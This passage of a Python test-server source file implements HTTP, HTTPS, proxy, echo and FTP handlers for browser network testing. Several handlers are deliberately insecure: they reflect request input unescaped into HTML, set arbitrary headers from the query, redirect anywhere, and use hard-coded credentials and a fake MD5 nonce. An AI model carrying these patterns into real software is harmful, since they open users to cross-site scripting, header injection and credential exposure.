def SetManyCookiesHandler(self):
"""This handler just sets a given number of cookies, for testing handling
of large numbers of cookies."""
if not self._ShouldHandleRequest("/set-many-cookies"):
return False
query_char = self.path.find('?')
if query_char != -1:
num_cookies = int(self.path[query_char + 1:])
else:
num_cookies = 0
self.send_response(200)
self.send_header('', 'text/html')
for _i in range(0, num_cookies):
self.send_header('Set-Cookie', 'a=')
self.end_headers()
self.wfile.write('%d cookies were sent' % num_cookies)
return True
def ExpectAndSetCookieHandler(self):
"""Expects some cookies to be sent, and if they are, sets more cookies.
The expect parameter specifies a required cookie. May be specified multiple
times.
The set parameter specifies a cookie to set if all required cookies are
preset. May be specified multiple times.
The data parameter specifies the response body data to be returned."""
if not self._ShouldHandleRequest("/expect-and-set-cookie"):
return False
_, _, _, _, query, _ = urlparse.urlparse(self.path)
query_dict = cgi.parse_qs(query)
cookies = set()
if 'Cookie' in self.headers:
cookie_header = self.headers.getheader('Cookie')
cookies.update([s.strip() for s in cookie_header.split(';')])
got_all_expected_cookies = True
for expected_cookie in query_dict.get('expect', []):
if expected_cookie not in cookies:
got_all_expected_cookies = False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
if got_all_expected_cookies:
for cookie_value in query_dict.get('set', []):
self.send_header('Set-Cookie', '%s' % cookie_value)
self.end_headers()
for data_value in query_dict.get('data', []):
self.wfile.write(data_value)
return True
def SetHeaderHandler(self):
"""This handler sets a response header. Parameters are in the
key%3A%20value&key2%3A%20value2 format."""
if not self._ShouldHandleRequest("/set-header"):
return False
query_char = self.path.find('?')
if query_char != -1:
headers_values = self.path[query_char + 1:].split('&')
else:
headers_values = ("",)
self.send_response(200)
self.send_header('Content-Type', 'text/html')
for header_value in headers_values:
header_value = urllib.unquote(header_value)
(key, value) = header_value.split(': ', 1)
self.send_header(key, value)
self.end_headers()
for header_value in headers_values:
self.wfile.write('%s' % header_value)
return True
def AuthBasicHandler(self):
"""This handler tests 'Basic' authentication. It just sends a page with
title 'user/pass' if you succeed."""
if not self._ShouldHandleRequest("/auth-basic"):
return False
username = userpass = password = b64str = ""
expected_password = 'secret'
realm = 'testrealm'
set_cookie_if_challenged = False
_, _, url_path, _, query, _ = urlparse.urlparse(self.path)
query_params = cgi.parse_qs(query, True)
if 'set-cookie-if-challenged' in query_params:
set_cookie_if_challenged = True
if 'password' in query_params:
expected_password = query_params['password'][0]
if 'realm' in query_params:
realm = query_params['realm'][0]
auth = self.headers.getheader('authorization')
try:
if not auth:
raise Exception('no auth')
b64str = re.findall(r'Basic (\S+)', auth)[0]
userpass = base64.b64decode(b64str)
username, password = re.findall(r'([^:]+):(\S+)', userpass)[0]
if password != expected_password:
raise Exception('wrong password')
except Exception, e:
# Authentication failed.
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
self.send_header('Content-Type', 'text/html')
if set_cookie_if_challenged:
self.send_header('Set-Cookie', 'got_challenged=true')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<title>Denied: %s</title>' % e)
self.wfile.write('</head><body>')
self.wfile.write('auth=%s<p>' % auth)
self.wfile.write('b64str=%s<p>' % b64str)
self.wfile.write('username: %s<p>' % username)
self.wfile.write('userpass: %s<p>' % userpass)
self.wfile.write('password: %s<p>' % password)
self.wfile.write('You sent:<br>%s<p>' % self.headers)
self.wfile.write('</body></html>')
return True
# Authentication successful. (Return a cachable response to allow for
# testing cached pages that require authentication.)
old_protocol_version = self.protocol_version
self.protocol_version = "HTTP/1.1"
if_none_match = self.headers.getheader('if-none-match')
if if_none_match == "abc":
self.send_response(304)
self.end_headers()
elif url_path.endswith(".gif"):
# Using chrome/test/data/google/logo.gif as the test image
test_image_path = ['google', 'logo.gif']
gif_path = os.path.join(self.server.data_dir, *test_image_path)
if not os.path.isfile(gif_path):
self.send_error(404)
self.protocol_version = old_protocol_version
return True
f = open(gif_path, "rb")
data = f.read()
f.close()
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-control', 'max-age=60000')
self.send_header('Etag', 'abc')
self.end_headers()
self.wfile.write(data)
else:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-control', 'max-age=60000')
self.send_header('Etag', 'abc')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<title>%s/%s</title>' % (username, password))
self.wfile.write('</head><body>')
self.wfile.write('auth=%s<p>' % auth)
self.wfile.write('You sent:<br>%s<p>' % self.headers)
self.wfile.write('</body></html>')
self.protocol_version = old_protocol_version
return True
def GetNonce(self, force_reset=False):
"""Returns a nonce that's stable per request path for the server's lifetime.
This is a fake implementation. A real implementation would only use a given
nonce a single time (hence the name n-once). However, for the purposes of
unittesting, we don't care about the security of the nonce.
Args:
force_reset: Iff set, the nonce will be changed. Useful for testing the
"stale" response.
"""
if force_reset or not self.server.nonce_time:
self.server.nonce_time = time.time()
return hashlib.md5('privatekey%s%d' %
(self.path, self.server.nonce_time)).hexdigest()
def AuthDigestHandler(self):
"""This handler tests 'Digest' authentication.
It just sends a page with title 'user/pass' if you succeed.
A stale response is sent iff "stale" is present in the request path.
"""
if not self._ShouldHandleRequest("/auth-digest"):
return False
stale = 'stale' in self.path
nonce = self.GetNonce(force_reset=stale)
opaque = hashlib.md5('opaque').hexdigest()
password = 'secret'
realm = 'testrealm'
auth = self.headers.getheader('authorization')
pairs = {}
try:
if not auth:
raise Exception('no auth')
if not auth.startswith('Digest'):
raise Exception('not digest')
# Pull out all the name="value" pairs as a dictionary.
pairs = dict(re.findall(r'(\b[^ ,=]+)="?([^",]+)"?', auth))
# Make sure it's all valid.
if pairs['nonce'] != nonce:
raise Exception('wrong nonce')
if pairs['opaque'] != opaque:
raise Exception('wrong opaque')
# Check the 'response' value and make sure it matches our magic hash.
# See http://www.ietf.org/rfc/rfc2617.txt
hash_a1 = hashlib.md5(
':'.join([pairs['username'], realm, password])).hexdigest()
hash_a2 = hashlib.md5(':'.join([self.command, pairs['uri']])).hexdigest()
if 'qop' in pairs and 'nc' in pairs and 'cnonce' in pairs:
response = hashlib.md5(':'.join([hash_a1, nonce, pairs['nc'],
pairs['cnonce'], pairs['qop'], hash_a2])).hexdigest()
else:
response = hashlib.md5(':'.join([hash_a1, nonce, hash_a2])).hexdigest()
if pairs['response'] != response:
raise Exception('wrong password')
except Exception, e:
# Authentication failed.
self.send_response(401)
hdr = ('Digest '
'realm="%s", '
'domain="/", '
'qop="auth", '
'algorithm=MD5, '
'nonce="%s", '
'opaque="%s"') % (realm, nonce, opaque)
if stale:
hdr += ', stale="TRUE"'
self.send_header('WWW-Authenticate', hdr)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<title>Denied: %s</title>' % e)
self.wfile.write('</head><body>')
self.wfile.write('auth=%s<p>' % auth)
self.wfile.write('pairs=%s<p>' % pairs)
self.wfile.write('You sent:<br>%s<p>' % self.headers)
self.wfile.write('We are replying:<br>%s<p>' % hdr)
self.wfile.write('</body></html>')
return True
# Authentication successful.
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<title>%s/%s</title>' % (pairs['username'], password))
self.wfile.write('</head><body>')
self.wfile.write('auth=%s<p>' % auth)
self.wfile.write('pairs=%s<p>' % pairs)
self.wfile.write('</body></html>')
return True
def SlowServerHandler(self):
"""Wait for the user suggested time before responding. The syntax is
/slow?0.5 to wait for half a second."""
if not self._ShouldHandleRequest("/slow"):
return False
query_char = self.path.find('?')
wait_sec = 1.0
if query_char >= 0:
try:
wait_sec = int(self.path[query_char + 1:])
except ValueError:
pass
time.sleep(wait_sec)
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write("waited %d seconds" % wait_sec)
return True
def ChunkedServerHandler(self):
"""Send chunked response. Allows to specify chunks parameters:
- waitBeforeHeaders - ms to wait before sending headers
- waitBetweenChunks - ms to wait between chunks
- chunkSize - size of each chunk in bytes
- chunksNumber - number of chunks
Example: /chunked?waitBeforeHeaders=1000&chunkSize=5&chunksNumber=5
waits one second, then sends headers and five chunks five bytes each."""
if not self._ShouldHandleRequest("/chunked"):
return False
query_char = self.path.find('?')
chunkedSettings = {'waitBeforeHeaders' : 0,
'waitBetweenChunks' : 0,
'chunkSize' : 5,
'chunksNumber' : 5}
if query_char >= 0:
params = self.path[query_char + 1:].split('&')
for param in params:
keyValue = param.split('=')
if len(keyValue) == 2:
try:
chunkedSettings[keyValue[0]] = int(keyValue[1])
except ValueError:
pass
time.sleep(0.001 * chunkedSettings['waitBeforeHeaders'])
self.protocol_version = 'HTTP/1.1' # Needed for chunked encoding
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Connection', 'close')
self.send_header('Transfer-Encoding', 'chunked')
self.end_headers()
# Chunked encoding: sending all chunks, then final zero-length chunk and
# then final CRLF.
for i in range(0, chunkedSettings['chunksNumber']):
if i > 0:
time.sleep(0.001 * chunkedSettings['waitBetweenChunks'])
self.sendChunkHelp('*' * chunkedSettings['chunkSize'])
self.wfile.flush() # Keep in mind that we start flushing only after 1kb.
self.sendChunkHelp('')
return True
def ContentTypeHandler(self):
"""Returns a string of html with the given content type. E.g.,
/contenttype?text/css returns an html file with the Content-Type
header set to text/css."""
if not self._ShouldHandleRequest("/contenttype"):
return False
query_char = self.path.find('?')
content_type = self.path[query_char + 1:].strip()
if not content_type:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write("<html>\n<body>\n<p>HTML text</p>\n</body>\n</html>\n")
return True
def NoContentHandler(self):
"""Returns a 204 No Content response."""
if not self._ShouldHandleRequest("/nocontent"):
return False
self.send_response(204)
self.end_headers()
return True
def ServerRedirectHandler(self):
"""Sends a server redirect to the given URL. The syntax is
'/server-redirect?http://foo.bar/asdf' to redirect to
'http://foo.bar/asdf'"""
test_name = "/server-redirect"
if not self._ShouldHandleRequest(test_name):
return False
query_char = self.path.find('?')
if query_char < 0 or len(self.path) <= query_char + 1:
self.sendRedirectHelp(test_name)
return True
dest = urllib.unquote(self.path[query_char + 1:])
self.send_response(301) # moved permanently
self.send_header('Location', dest)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('</head><body>Redirecting to %s</body></html>' % dest)
return True
def ClientRedirectHandler(self):
"""Sends a client redirect to the given URL. The syntax is
'/client-redirect?http://foo.bar/asdf' to redirect to
'http://foo.bar/asdf'"""
test_name = "/client-redirect"
if not self._ShouldHandleRequest(test_name):
return False
query_char = self.path.find('?')
if query_char < 0 or len(self.path) <= query_char + 1:
self.sendRedirectHelp(test_name)
return True
dest = urllib.unquote(self.path[query_char + 1:])
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head>')
self.wfile.write('<meta http-equiv="refresh" content="0;url=%s">' % dest)
self.wfile.write('</head><body>Redirecting to %s</body></html>' % dest)
return True
def MultipartHandler(self):
"""Send a multipart response (10 text/html pages)."""
test_name = '/multipart'
if not self._ShouldHandleRequest(test_name):
return False
num_frames = 10
bound = '12345'
self.send_response(200)
self.send_header('Content-Type',
'multipart/x-mixed-replace;boundary=' + bound)
self.end_headers()
for i in xrange(num_frames):
self.wfile.write('--' + bound + '\r\n')
self.wfile.write('Content-Type: text/html\r\n\r\n')
self.wfile.write('<title>page ' + str(i) + '</title>')
self.wfile.write('page ' + str(i))
self.wfile.write('--' + bound + '--')
return True
def GetSSLSessionCacheHandler(self):
"""Send a reply containing a log of the session cache operations."""
if not self._ShouldHandleRequest('/ssl-session-cache'):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
try:
for (action, sessionID) in self.server.session_cache.log:
self.wfile.write('%s\t%s\n' % (action, sessionID.encode('hex')))
except AttributeError:
self.wfile.write('Pass --https-record-resume in order to use' +
' this request')
return True
def SSLManySmallRecords(self):
"""Sends a reply consisting of a variety of small writes. These will be
translated into a series of small SSL records when used over an HTTPS
server."""
if not self._ShouldHandleRequest('/ssl-many-small-records'):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
# Write ~26K of data, in 1350 byte chunks
for i in xrange(20):
self.wfile.write('*' * 1350)
self.wfile.flush()
return True
def GetChannelID(self):
"""Send a reply containing the hashed ChannelID that the client provided."""
if not self._ShouldHandleRequest('/channel-id'):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
channel_id = self.server.tlsConnection.channel_id.tostring()
self.wfile.write(hashlib.sha256(channel_id).digest().encode('base64'))
return True
def CloseSocketHandler(self):
"""Closes the socket without sending anything."""
if not self._ShouldHandleRequest('/close-socket'):
return False
self.wfile.close()
return True
def RangeResetHandler(self):
"""Send data broken up by connection resets every N (default 4K) bytes.
Support range requests. If the data requested doesn't straddle a reset
boundary, it will all be sent. Used for testing resuming downloads."""
def DataForRange(start, end):
"""Data to be provided for a particular range of bytes."""
# Offset and scale to avoid too obvious (and hence potentially
# collidable) data.
return ''.join([chr(y % 256)
for y in range(start * 2 + 15, end * 2 + 15, 2)])
if not self._ShouldHandleRequest('/rangereset'):
return False
_, _, url_path, _, query, _ = urlparse.urlparse(self.path)
# Defaults
size = 8000
# Note that the rst is sent just before sending the rst_boundary byte.
rst_boundary = 4000
respond_to_range = True
hold_for_signal = False
rst_limit = -1
token = 'DEFAULT'
fail_precondition = 0
send_verifiers = True
# Parse the query
qdict = urlparse.parse_qs(query, True)
if 'size' in qdict:
size = int(qdict['size'][0])
if 'rst_boundary' in qdict:
rst_boundary = int(qdict['rst_boundary'][0])
if 'token' in qdict:
# Identifying token for stateful tests.
token = qdict['token'][0]
if 'rst_limit' in qdict:
# Max number of rsts for a given token.
rst_limit = int(qdict['rst_limit'][0])
if 'bounce_range' in qdict:
respond_to_range = False
if 'hold' in qdict:
# Note that hold_for_signal will not work with null range requests;
# see TODO below.
hold_for_signal = True
if 'no_verifiers' in qdict:
send_verifiers = False
if 'fail_precondition' in qdict:
fail_precondition = int(qdict['fail_precondition'][0])
# Record already set information, or set it.
rst_limit = TestPageHandler.rst_limits.setdefault(token, rst_limit)
if rst_limit != 0:
TestPageHandler.rst_limits[token] -= 1
fail_precondition = TestPageHandler.fail_precondition.setdefault(
token, fail_precondition)
if fail_precondition != 0:
TestPageHandler.fail_precondition[token] -= 1
first_byte = 0
last_byte = size - 1
# Does that define what we want to return, or do we need to apply
# a range?
range_response = False
range_header = self.headers.getheader('range')
if range_header and respond_to_range:
mo = re.match("bytes=(\d*)-(\d*)", range_header)
if mo.group(1):
first_byte = int(mo.group(1))
if mo.group(2):
last_byte = int(mo.group(2))
if last_byte > size - 1:
last_byte = size - 1
range_response = True
if last_byte < first_byte:
return False
if (fail_precondition and
(self.headers.getheader('If-Modified-Since') or
self.headers.getheader('If-Match'))):
self.send_response(412)
self.end_headers()
return True
if range_response:
self.send_response(206)
self.send_header('Content-Range',
'bytes %d-%d/%d' % (first_byte, last_byte, size))
else:
self.send_response(200)
self.send_header('Content-Type', 'application/octet-stream')
self.send_header('Content-Length', last_byte - first_byte + 1)
if send_verifiers:
self.send_header('Etag', '"XYZZY"')
self.send_header('Last-Modified', 'Tue, 19 Feb 2013 14:32 EST')
self.end_headers()
if hold_for_signal:
# TODO(rdsmith/phajdan.jr): http://crbug.com/169519: Without writing
# a single byte, the self.server.handle_request() below hangs
# without processing new incoming requests.
self.wfile.write(DataForRange(first_byte, first_byte + 1))
first_byte = first_byte + 1
# handle requests until one of them clears this flag.
self.server.wait_for_download = True
while self.server.wait_for_download:
self.server.handle_request()
possible_rst = ((first_byte / rst_boundary) + 1) * rst_boundary
if possible_rst >= last_byte or rst_limit == 0:
# No RST has been requested in this range, so we don't need to
# do anything fancy; just write the data and let the python
# infrastructure close the connection.
self.wfile.write(DataForRange(first_byte, last_byte + 1))
self.wfile.flush()
return True
# We're resetting the connection part way in; go to the RST
# boundary and then send an RST.
# Because socket semantics do not guarantee that all the data will be
# sent when using the linger semantics to hard close a socket,
# we send the data and then wait for our peer to release us
# before sending the reset.
data = DataForRange(first_byte, possible_rst)
self.wfile.write(data)
self.wfile.flush()
self.server.wait_for_download = True
while self.server.wait_for_download:
self.server.handle_request()
l_onoff = 1 # Linger is active.
l_linger = 0 # Seconds to linger for.
self.connection.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', l_onoff, l_linger))
# Close all duplicates of the underlying socket to force the RST.
self.wfile.close()
self.rfile.close()
self.connection.close()
return True
def DefaultResponseHandler(self):
"""This is the catch-all response handler for requests that aren't handled
by one of the special handlers above.
Note that we specify the content-length as without it the https connection
is not closed properly (and the browser keeps expecting data)."""
contents = "Default response given for path: " + self.path
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', len(contents))
self.end_headers()
if (self.command != 'HEAD'):
self.wfile.write(contents)
return True
def RedirectConnectHandler(self):
"""Sends a redirect to the CONNECT request for www.redirect.com. This
response is not specified by the RFC, so the browser should not follow
the redirect."""
if (self.path.find("www.redirect.com") < 0):
return False
dest = "http://www.destination.com/foo.js"
self.send_response(302) # moved temporarily
self.send_header('Location', dest)
self.send_header('Connection', 'close')
self.end_headers()
return True
def ServerAuthConnectHandler(self):
"""Sends a 401 to the CONNECT request for www.server-auth.com. This
response doesn't make sense because the proxy server cannot request
server authentication."""
if (self.path.find("www.server-auth.com") < 0):
return False
challenge = 'Basic realm="WallyWorld"'
self.send_response(401) # unauthorized
self.send_header('WWW-Authenticate', challenge)
self.send_header('Connection', 'close')
self.end_headers()
return True
def DefaultConnectResponseHandler(self):
"""This is the catch-all response handler for CONNECT requests that aren't
handled by one of the special handlers above. Real Web servers respond
with 400 to CONNECT requests."""
contents = "Your client has issued a malformed or illegal request."
self.send_response(400) # bad request
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', len(contents))
self.end_headers()
self.wfile.write(contents)
return True
# called by the redirect handling function when there is no parameter
def sendRedirectHelp(self, redirect_name):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><body><h1>Error: no redirect destination</h1>')
self.wfile.write('Use <pre>%s?http://dest...</pre>' % redirect_name)
self.wfile.write('</body></html>')
# called by chunked handling function
def sendChunkHelp(self, chunk):
# Each chunk consists of: chunk size (hex), CRLF, chunk body, CRLF
self.wfile.write('%X\r\n' % len(chunk))
self.wfile.write(chunk)
self.wfile.write('\r\n')
class OCSPHandler(testserver_base.BasePageHandler):
def __init__(self, request, client_address, socket_server):
handlers = [self.OCSPResponse]
self.ocsp_response = socket_server.ocsp_response
testserver_base.BasePageHandler.__init__(self, request, client_address,
socket_server, [], handlers, [],
handlers, [])
def OCSPResponse(self):
self.send_response(200)
self.send_header('Content-Type', 'application/ocsp-response')
self.send_header('Content-Length', str(len(self.ocsp_response)))
self.end_headers()
self.wfile.write(self.ocsp_response)
class TCPEchoHandler(SocketServer.BaseRequestHandler):
"""The RequestHandler class for TCP echo server.
It is instantiated once per connection to the server, and overrides the
handle() method to implement communication to the client.
"""
def handle(self):
"""Handles the request from the client and constructs a response."""
data = self.request.recv(65536).strip()
# Verify the "echo request" message received from the client. Send back
# "echo response" message if "echo request" message is valid.
try:
return_data = echo_message.GetEchoResponseData(data)
if not return_data:
return
except ValueError:
return
self.request.send(return_data)
class UDPEchoHandler(SocketServer.BaseRequestHandler):
"""The RequestHandler class for UDP echo server.
It is instantiated once per connection to the server, and overrides the
handle() method to implement communication to the client.
"""
def handle(self):
"""Handles the request from the client and constructs a response."""
data = self.request[0].strip()
request_socket = self.request[1]
# Verify the "echo request" message received from the client. Send back
# "echo response" message if "echo request" message is valid.
try:
return_data = echo_message.GetEchoResponseData(data)
if not return_data:
return
except ValueError:
return
request_socket.sendto(return_data, self.client_address)
class BasicAuthProxyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""A request handler that behaves as a proxy server which requires
basic authentication. Only CONNECT, GET and HEAD is supported for now.
"""
_AUTH_CREDENTIAL = 'Basic Zm9vOmJhcg==' # foo:bar
def parse_request(self):
"""Overrides parse_request to check credential."""
if not BaseHTTPServer.BaseHTTPRequestHandler.parse_request(self):
return False
auth = self.headers.getheader('Proxy-Authorization')
if auth != self._AUTH_CREDENTIAL:
self.send_response(407)
self.send_header('Proxy-Authenticate', 'Basic realm="MyRealm1"')
self.end_headers()
return False
return True
def _start_read_write(self, sock):
sock.setblocking(0)
self.request.setblocking(0)
rlist = [self.request, sock]
while True:
ready_sockets, _unused, errors = select.select(rlist, [], [])
if errors:
self.send_response(500)
self.end_headers()
return
for s in ready_sockets:
received = s.recv(1024)
if len(received) == 0:
return
if s == self.request:
other = sock
else:
other = self.request
other.send(received)
def _do_common_method(self):
url = urlparse.urlparse(self.path)
port = url.port
if not port:
if url.scheme == 'http':
port = 80
elif url.scheme == 'https':
port = 443
if not url.hostname or not port:
self.send_response(400)
self.end_headers()
return
if len(url.path) == 0:
path = '/'
else:
path = url.path
if len(url.query) > 0:
path = '%s?%s' % (url.path, url.query)
sock = None
try:
sock = socket.create_connection((url.hostname, port))
sock.send('%s %s %s\r\n' % (
self.command, path, self.protocol_version))
for header in self.headers.headers:
header = header.strip()
if (header.lower().startswith('connection') or
header.lower().startswith('proxy')):
continue
sock.send('%s\r\n' % header)
sock.send('\r\n')
self._start_read_write(sock)
except Exception:
self.send_response(500)
self.end_headers()
finally:
if sock is not None:
sock.close()
def do_CONNECT(self):
try:
pos = self.path.rfind(':')
host = self.path[:pos]
port = int(self.path[pos+1:])
except Exception:
self.send_response(400)
self.end_headers()
try:
sock = socket.create_connection((host, port))
self.send_response(200, 'Connection established')
self.end_headers()
self._start_read_write(sock)
except Exception:
self.send_response(500)
self.end_headers()
finally:
sock.close()
def do_GET(self):
self._do_common_method()
def do_HEAD(self):
self._do_common_method()
class ServerRunner(testserver_base.TestServerRunner):
"""TestServerRunner for the net test servers."""
def __init__(self):
super(ServerRunner, self).__init__()
self.__ocsp_server = None
def __make_data_dir(self):
if self.options.data_dir:
if not os.path.isdir(self.options.data_dir):
raise testserver_base.OptionError('specified data dir not found: ' +
self.options.data_dir + ' exiting...')
my_data_dir = self.options.data_dir
else:
# Create the default path to our data dir, relative to the exe dir.
my_data_dir = os.path.join(BASE_DIR, "..", "..", "..", "..",
"test", "data")
#TODO(ibrar): Must use Find* funtion defined in google\tools
#i.e my_data_dir = FindUpward(my_data_dir, "test", "data")
return my_data_dir
def create_server(self, server_data):
port = self.options.port
host = self.options.host
if self.options.server_type == SERVER_HTTP:
if self.options.https:
pem_cert_and_key = None
if self.options.cert_and_key_file:
if not os.path.isfile(self.options.cert_and_key_file):
raise testserver_base.OptionError(
'specified server cert file not found: ' +
self.options.cert_and_key_file + ' exiting...')
pem_cert_and_key = file(self.options.cert_and_key_file, 'r').read()
else:
# generate a new certificate and run an OCSP server for it.
self.__ocsp_server = OCSPServer((host, 0), OCSPHandler)
print ('OCSP server started on %s:%d...' %
(host, self.__ocsp_server.server_port))
ocsp_der = None
ocsp_state = None
if self.options.ocsp == 'ok':
ocsp_state = minica.OCSP_STATE_GOOD
elif self.options.ocsp == 'revoked':
ocsp_state = minica.OCSP_STATE_REVOKED
elif self.options.ocsp == 'invalid':
ocsp_state = minica.OCSP_STATE_INVALID
elif self.options.ocsp == 'unauthorized':
ocsp_state = minica.OCSP_STATE_UNAUTHORIZED
elif self.options.ocsp == 'unknown':
ocsp_state = minica.OCSP_STATE_UNKNOWN
else:
raise testserver_base.OptionError('unknown OCSP status: ' +
self.options.ocsp_status)
(pem_cert_and_key, ocsp_der) = minica.GenerateCertKeyAndOCSP(
subject = "127.0.0.1",
ocsp_url = ("http://%s:%d/ocsp" %
(host, self.__ocsp_server.server_port)),
ocsp_state = ocsp_state,
serial = self.options.cert_serial)
self.__ocsp_server.ocsp_response = ocsp_der
for ca_cert in self.options.ssl_client_ca:
if not os.path.isfile(ca_cert):
raise testserver_base.OptionError(
'specified trusted client CA file not found: ' + ca_cert +
' exiting...')
server = HTTPSServer((host, port), TestPageHandler, pem_cert_and_key,
self.options.ssl_client_auth,
self.options.ssl_client_ca,
self.options.ssl_bulk_cipher,
self.options.record_resume,
self.options.tls_intolerant)
print 'HTTPS server started on %s:%d...' % (host, server.server_port)
else:
server = HTTPServer((host, port), TestPageHandler)
print 'HTTP server started on %s:%d...' % (host, server.server_port)
server.data_dir = self.__make_data_dir()
server.file_root_url = self.options.file_root_url
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_WEBSOCKET:
# Launch pywebsocket via WebSocketServer.
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
# TODO(toyoshim): Remove following os.chdir. Currently this operation
# is required to work correctly. It should be fixed from pywebsocket side.
os.chdir(self.__make_data_dir())
websocket_options = WebSocketOptions(host, port, '.')
if self.options.cert_and_key_file:
websocket_options.use_tls = True
websocket_options.private_key = self.options.cert_and_key_file
websocket_options.certificate = self.options.cert_and_key_file
if self.options.ssl_client_auth:
websocket_options.tls_client_auth = True
if len(self.options.ssl_client_ca) != 1:
raise testserver_base.OptionError(
'one trusted client CA file should be specified')
if not os.path.isfile(self.options.ssl_client_ca[0]):
raise testserver_base.OptionError(
'specified trusted client CA file not found: ' +
self.options.ssl_client_ca[0] + ' exiting...')
websocket_options.tls_client_ca = self.options.ssl_client_ca[0]
server = WebSocketServer(websocket_options)
print 'WebSocket server started on %s:%d...' % (host, server.server_port)
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_TCP_ECHO:
# Used for generating the key (randomly) that encodes the "echo request"
# message.
random.seed()
server = TCPEchoServer((host, port), TCPEchoHandler)
print 'Echo TCP server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_UDP_ECHO:
# Used for generating the key (randomly) that encodes the "echo request"
# message.
random.seed()
server = UDPEchoServer((host, port), UDPEchoHandler)
print 'Echo UDP server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_BASIC_AUTH_PROXY:
server = HTTPServer((host, port), BasicAuthProxyRequestHandler)
print 'BasicAuthProxy server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_FTP:
my_data_dir = self.__make_data_dir()
# Instantiate a dummy authorizer for managing 'virtual' users
authorizer = pyftpdlib.ftpserver.DummyAuthorizer()
# Define a new user having full r/w permissions and a read-only
# anonymous user
authorizer.add_user('chrome', 'chrome', my_data_dir, perm='elradfmw')
authorizer.add_anonymous(my_data_dir)
# Instantiate FTP handler class
ftp_handler = pyftpdlib.ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
# Define a customized banner (string returned when client connects)
ftp_handler.banner = ("pyftpdlib %s based ftpd ready." %
pyftpdlib.ftpserver.__ver__)
# Instantiate FTP server class and listen to address:port
server = pyftpdlib.ftpserver.FTPServer((host, port), ftp_handler)
server_data['port'] = server.socket.getsockname()[1]
print 'FTP server started on port %d...' % server_data['port']
else:
raise testserver_base.OptionError('unknown server type' +
self.options.server_type)
return server
def run_server(self):
if self.__ocsp_server:
self.__ocsp_server.serve_forever_on_thread()
testserver_base.TestServerRunner.run_server(self)
if self.__ocsp_server:
self.__ocsp_server.stop_serving()
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('-f', '--ftp', action='store_const',
const=SERVER_FTP, default=SERVER_HTTP,
dest='server_type',
help='start up an FTP server.')
self.option_parser.add_option('--tcp-echo', action='store_const',
const=SERVER_TCP_ECHO, default=SERVER_HTTP,
dest='server_type',
help='start up a tcp echo server.')
self.option_parser.add_option('--udp-echo', action='store_const',
const=SERVER_UDP_ECHO, default=SERVER_HTTP,
dest='server_type',
help='start up a udp echo server.')
self.option_parser.add_option('--basic-auth-proxy', action='store_const',
const=SERVER_BASIC_AUTH_PROXY,
default=SERVER_HTTP, dest='server_type',
help='start up a proxy server which requires '
'basic authentication.')
self.option_parser.add_option('--websocket', action='store_const',
const=SERVER_WEBSOCKET, default=SERVER_HTTP,
dest='server_type',
help='start up a WebSocket server.')
self.option_parser.add_option('--https', action='store_true',
dest='https', help='Specify that https '
'should be used.')
self.option_parser.add_option('--cert-and-key-file',
dest='cert_and_key_file', help='specify the '
'path to the file containing the certificate '
'and private key for the server in PEM '
'format')
self.option_parser.add_option('--ocsp', dest='ocsp', default='ok',
help='The type of OCSP response generated '
'for the automatically generated '
'certificate. One of [ok,revoked,invalid]')
self.option_parser.add_option('--cert-serial', dest='cert_serial',
default=0, type=int,
help='If non-zero then the generated '
'certificate will have this serial number')
self.option_parser.add_option('--tls-intolerant', dest='tls_intolerant',
default='0', type='int',
help='If nonzero, certain TLS connections '
'will be aborted in order to test version '
'fallback. 1 means all TLS versions will be '
'aborted. 2 means TLS 1.1 or higher will be '
'aborted. 3 means TLS 1.2 or higher will be '
'aborted.')
self.option_parser.add_option('--https-record-resume',
dest='record_resume', const=True,
default=False, action='store_const',
help='Record resumption cache events rather '
'than resuming as normal. Allows the use of '
'the /ssl-session-cache request')
self.option_parser.add_option('--ssl-client-auth', action='store_true',
help='Require SSL client auth on every '
'connection.')
self.option_parser.add_option('--ssl-client-ca', action='append',
default=[], help='Specify that the client '
'certificate request should include the CA '
'named in the subject of the DER-encoded '
'certificate contained in the specified '
'file. This option may appear multiple '
'times, indicating multiple CA names should '
'be sent in the request.')
self.option_parser.add_option('--ssl-bulk-cipher', action='append',
help='Specify the bulk encryption '
'algorithm(s) that will be accepted by the '
'SSL server. Valid values are "aes256", '
'"aes128", "3des", "rc4". If omitted, all '
'algorithms will be used. This option may '
'appear multiple times, indicating '
'multiple algorithms should be enabled.');
self.option_parser.add_option('--file-root-url', default='/files/',
help='Specify a root URL for files served.')
if __name__ == '__main__':
